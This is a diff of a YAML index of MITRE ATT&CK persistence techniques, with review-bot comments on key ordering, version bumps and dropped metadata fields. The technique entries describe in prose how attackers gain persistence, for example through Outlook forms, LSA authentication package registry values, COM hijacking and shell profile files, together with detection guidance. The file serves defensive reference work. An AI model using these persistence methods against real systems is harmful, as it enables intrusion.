- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33388,22 +33777,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
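Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) is dropped from T1137.003 in this hunk, while the rewritten T1547.006 object earlier in the same patch keeps `x_mitre_permissions_required: - root`. If the field is being intentionally phased out, the two records should be treated the same way; if it simply reflects what upstream provides per object, a comment or commit note saying so would save the next reviewer from asking. Separately, the `external_references` list is re-emitted in a different order (sorted by `source_name` rather than citation order), which is fine but should be a deliberate, documented generator setting so the ordering does not flip again on the next sync.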
@@ -33469,7 +33885,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -33543,11 +33958,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33564,7 +33978,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33574,7 +33987,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33583,19 +33996,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -33643,11 +34054,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33676,24 +34088,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33728,9 +34142,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33790,7 +34201,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33815,13 +34226,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33874,8 +34283,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33923,78 +34332,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
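Review bot: the T1546.004 change is a key reorder rather than a content change, but it is rendered as a 69-line delete with the same 13 `external_references` entries (mitre-attack, intezer-kaiji-malware, bencane blog bashrc, anomali-rocke-tactics, Linux manual bash invocation, Tsunami, anomali-linux-rabbit, Magento, ScriptingOSX zsh, PersistentJXA_leopitt, code_persistence_zsh, macOS MS office sandbox escape, ESF_filemonitor) re-added further down in a different order. The only substantive differences are `modified` advancing to 2024-09-25 and the `bencane blog bashrc` citation moving to a web.archive.org snapshot with an updated retrieval date, while `x_mitre_version: '2.1'` is unchanged, which is consistent with a citation-only upstream update. If the generator can emit keys in a stable order (for example sorted), future diffs of this file would show only the real changes.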
@@ -34042,6 +34384,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -34052,9 +34398,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -34063,8 +34413,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
@@ -34101,7 +34510,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34124,12 +34533,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -34207,41 +34615,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34250,27 +34628,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
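Review bot: `x_mitre_permissions_required` (Administrator, User) is removed from T1137.004 in this hunk, while T1505.004 (Administrator, SYSTEM) and T1547.002 (Administrator) keep theirs earlier in the patch. That mixed state is fine if it is driven by the source data (the version bump 1.1 to 1.2 and the `Office 365` to `Office Suite` platform rename suggest a newer upstream object), but it should not be the result of hand-editing; confirm that the whole file is regenerated from one bundle rather than partially updated.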
@@ -34331,7 +34736,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -34375,7 +34779,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -34397,7 +34801,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34478,7 +34881,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -34501,7 +34903,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34531,12 +34933,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
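Review bot: T1037.003 loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` here, while the adjacent T1197 entry (and most other entries in the patch) keeps `x_mitre_attack_spec_version`. Same question as for T1505.004: if only `spec_version` is meant to go, retain the `x_mitre_attack_spec_version: 2.1.0` line unless it is re-added outside this hunk. The `modified` value for T1037.003 also regresses by more than a year (2021-04-29 to 2020-03-24), so this entry is a good one to spot-check against the source bundle.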
@@ -34626,12 +35026,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
